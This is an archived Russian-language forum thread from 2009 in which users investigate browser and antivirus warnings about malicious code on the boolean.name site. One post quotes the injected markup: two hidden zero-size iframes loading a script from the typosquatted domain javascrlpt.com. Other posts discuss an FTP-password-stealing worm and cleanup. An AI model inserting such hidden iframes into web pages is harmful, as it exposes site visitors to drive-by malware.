forum.boolean.name

forum.boolean.name (http://forum.boolean.name/index.php)
-   Наш форум (http://forum.boolean.name/forumdisplay.php?f=24)
-   -   ifframe - что это? оО (http://forum.boolean.name/showthread.php?t=9006)

Данил 26.08.2009 17:50

ifframe - что это? оО
 

Что это ? о_О второй день уже.
Мне надо на антивирусы провериться или что-то другое?)

ARA 26.08.2009 18:49

Ответ: ifframe - что это? оО
 
Цитата:

Сообщение от Данил (Сообщение 116375)
Мне надо на антивирусы провериться или что-то другое?)

На беременность можешь провериться :)

Но что-то мне подсказывает, что это паранойа у Гуглохрома такая.

NitE 26.08.2009 18:53

Ответ: ifframe - что это? оО
 
Цитата:

Мне надо на антивирусы провериться или что-то другое?)
ага, у тебя могут быть антивирусы в области переносицы, так-что проверься ))
Цитата:

Что это ? о_О второй день уже.
это у тебя какойто тупой вирус рекламирующий liveinternet.ru. сайт не заражен, так-что трабл у тебя.

johnk 26.08.2009 18:55

Ответ: ifframe - что это? оО
 
У меня точно такая же муть. Я под Жугло Хромом.

ARA 26.08.2009 19:01

Ответ: ifframe - что это? оО
 
Вложений: 1
Кстати и у меня быдлохром выдал:

NitE 26.08.2009 19:03

Ответ: ifframe - что это? оО
 
люди, пользуйтесь оперой ))

ARA 26.08.2009 19:09

Ответ: ifframe - что это? оО
 
Нет! Пользуйтесь Хромом!

зы. Похоливарим?

johnk 26.08.2009 19:10

Ответ: ifframe - что это? оО
 
Да ну вас, пойду на IE.

turBO 26.08.2009 19:30

Ответ: ifframe - что это? оО
 
В область HTML тега <IFRAME> в принципе можно в качестве содержимого вставить вредоносный скрипт. "Хром" пока из беты никто не выписывал и, видно, google-прогеры защитились предупреждением, чтоб не ковыряться что там в Теге да как...

Но с другой стороны выполнение java-скрипта из стороннего сайта (в данном случае http://javascrlpt.com) действительно может настораживать...

johnk 26.08.2009 20:51

Ответ: ifframe - что это? оО
 
Нужно срочно вычищать вредоносный код, а то гугл зойбанит и будет как с сайтом HGE.

Данил 26.08.2009 20:59

Ответ: ifframe - что это? оО
 
ниче не понял %) но , почему-то доволен.
Пошел качать антивирь

Randomize 26.08.2009 21:17

Ответ: ifframe - что это? оО
 
Блин я ржалъ...
http://javascript.com/ - Они крадут наши кредитки!
очень порадовало.
Глюк этот изза AJAX на e107.
Дело в том если двиг не может понять что сейчас за браузер то он орагизует связь с бекэндом через невидимые фреймы. В своё время невидимые фреймы приводили к лагам краху и вобще через них на комп пробиралась всякая лажа.

turBO 26.08.2009 22:09

Ответ: ifframe - что это? оО
 
Цитата:

Сообщение от Randomize (Сообщение 116404)
Блин я ржалъ...
http://javascript.com/ - Они крадут наши кредитки!

http://javascrlpt.com/ -разница в написании есть!
Да просто надо вычистить main-страницу.

SubZer0 28.08.2009 21:07

Ответ: ifframe - что это? оО
 
угроза ясна... но есть одна проблема...

1. открываем страницу и ищем там текст javascript.com, или части от сего... хз.. я не нашел...

2. вкуриваем Касперского ВНИМАТЕЛЬНО "В приложении ... обнаружена сылка на вебстраницу...", т.е. не на сайте а в приложении...

3. Насколько я помню гугл даже в лицензии предупреждает о сохранении у себя на сервере приватных данных (материал немецких новостей по каналу ARD), таким образом кража данных вполне реальное явления для браузера от гугля...

С/У

johnk 28.08.2009 21:23

Ответ: ifframe - что это? оО
 
<iframe wytqb='VZgIcnFd' eoegy='W44SRdhC' jhmka='IKe83EI8' src='http://javascrlpt.com/s/in.cgi?8 ' tjrur='bxy5Q95L' umuah='lNq4K8k8' pdxgp='V5TsiXdt' width='0' height='0' style='display:none'></iframe>
<iframe uitak='pfs06HVv' aesjj='NcZYAnmv' src='http://javascrlpt.com/s/in.cgi?8 ' svxet='djuNB6bZ' ibdqr='xPZfgbxV' width='0' height='0' style='display:none'></iframe>

Вот из кода страницы. javascrlpt.com.

SubZer0 29.08.2009 13:24

Ответ: ifframe - что это? оО
 
опять у меня проблема... не вижу ничего... пробовал с разных компов выходить, с разных браузеров, с антивирусом и без... не нахожу я там никакого iframe...

:(

impersonalis 29.08.2009 14:36

Ответ: ifframe - что это? оО
 
У меня тоже форточки не вываливаются

Шуранов 29.08.2009 14:43

Ответ: ifframe - что это? оО
 
Сейчас этого кода нет на главной странице. Проблема решена, да и сам аккаунт вредоносного домена засуспендили. Так что беспокоиться не о чем.

Atomikc 29.08.2009 19:37

Ответ: ifframe - что это? оО
 
Хром не ругать... Всё с ним гут...

SubZer0 29.08.2009 19:52

Ответ: ifframe - что это? оО
 
Я не понял...

кем проблема решена?

Шуранов 29.08.2009 20:23

Ответ: ifframe - что это? оО
 
Догадываюсь, что кем-то из администрации, либо того, кто имеет прямой доступ к хостингу. В исходном коде нет как самого iframe, так и возможных скриптов, которые могли бы его динамически генерировать. Впрочем, если бы он и был, то суспенд домена, к которому он обращался, также решал проблему.

Вообще очень похоже на вирус, который был около полутора лет назад. Вирус отлавливал данные ftp (обычно из Total Commander и FileZilla), соединялся с сервером и дописывал свой код в index.php / index.html файлы. Возможно, это оно и было. Рекомендую администрации проверить на всякий случаи свои компьютеры.

SubZer0 29.08.2009 21:24

Ответ: ifframe - что это? оО
 
беда в том, что кроме меня никто не должен иметь доступ... таким образом никто не может (не должен) стереть вирус... да и зачем стирать вирус...:dontknow:

NitE 29.08.2009 21:38

Ответ: ifframe - что это? оО
 
хах, да незачем, не считая того что 70% шанс что в любой момент сайт упадет, или база данных улетит.

johnk 29.08.2009 21:46

Ответ: ifframe - что это? оО
 
Нитэ прав, лучше быть чистым, а то гуглома зойбанит, насяльника!

Шуранов 30.08.2009 00:23

Ответ: ifframe - что это? оО
 
Ну тогда даже предположить не могу, если более никто не имеет доступ. Я самого кода не видел, сразу после появления темы полез в сорцы, но не нашел. Так что остается тогда только гадать причину появления такого сообщения. Основные реальные причины я уже описал. Можно предположить фантастический вариант, что такой код выдается только под специфичные браузеры, но я сомневаюсь в этом - движок e107 настолько запутан (69 кб вроде ядро, беспорядочно написанное, поправьте, если ошибаюсь), что в нем дописывать это будет жутко неудобно.

SBJoker 30.08.2009 01:04

Ответ: ifframe - что это? оО
 
Да блин этож элементарно, у лудей были на компе черви что и пихали эдварку... а сай то чист.

johnk 30.08.2009 09:24

Ответ: ifframe - что это? оО
 
Цитата:

у лудей были на компе черви
Нет. У меня чистая винда.

SubZer0 30.08.2009 13:16

Ответ: ifframe - что это? оО
 
Цитата:

Сообщение от johnk (Сообщение 116802)
Нет. У меня чистая винда.

рекомендую исследовать комп при помощи AVZ, максимальная эвристика... и основательно исследовать каждую красную строчку... особенно перехват системных функций... ибо были случаи когда всякие навороченные касперы говорят что комп чист, а на компе куча фиктивных скрытых драйверов перехватывающих системные функции...

:)

Шуранов 30.08.2009 13:58

Ответ: ifframe - что это? оО
 
Червь пихающий adware не такая редкость, но скрытый iframe, не отображающий рекламы? Писавшие червя были большими оригиналами, такой оригинальный способ обхода firewall...
Впрочем, сейчас на главной все спокойно, даже у тех, кто ранее жаловался.

SubZer0 30.08.2009 20:09

Ответ: ifframe - что это? оО
 
Теоретически могу предположить (с большой вероятностью) проделки Хроно Синдром... (случайность маловероятна)... с момента удаления ее аккаунта мой комп, которому антивирус чужд, неоднократно подвергался опасности... из нета... включая завлекалово на сайт посмотреть фотки с попыткой выяснить IP...

ФТП пароль от boolean.name (не от форума, форум находится на отдельном аккаунте с отдельным доступом) хранился и в TC и в FileZilla... когда я фотки выливал...

на моем компе вчера был обнаружен rootkit и несколько вирусов... всвязи с этим ОС Винда была благополучно убита...

из всего вышесказанного можно со сравнительно высокой вероятностью утечку ФТП пароля...

Пароли были благополучно заменяны... за время предположительной открытости паролей вредоносных действий незамечено...

:rolleyes:

Шуранов 31.08.2009 10:57

Ответ: ifframe - что это? оО
 
Кстати, правду говорят, что в Германии Linux вообще более популярен, чем Windows?

NitE 31.08.2009 15:21

Ответ: ifframe - что это? оО
 
врядли, в германий люди тоже не прочь поиграть

SubZer0 31.08.2009 15:27

Ответ: ifframe - что это? оО
 
Цитата:

Сообщение от Шуранов (Сообщение 116902)
Кстати, правду говорят, что в Германии Linux вообще более популярен, чем Windows?

Ну я бы сказал Линукс здесь популярнее чем в России, но винда всеравно рулит...

Десктопов на виндовсе около 80%, серверов на виндовсе около 5% (по телеку статистику говорили) :)

Randomize 08.07.2020 23:32

Ответ: ifframe - что это? оО
 
Спустя 11 лет..
Этот вредоносный фрейм кем-то и когда-то был вставлен в скрипты булки, а именно в скрипт логина и индекс.
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):
У вас нет прав, чтобы видеть скрытый текст, содержащийся здесь.


Часовой пояс GMT +4, время: 19:27.

vBulletin® Version 3.6.5.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot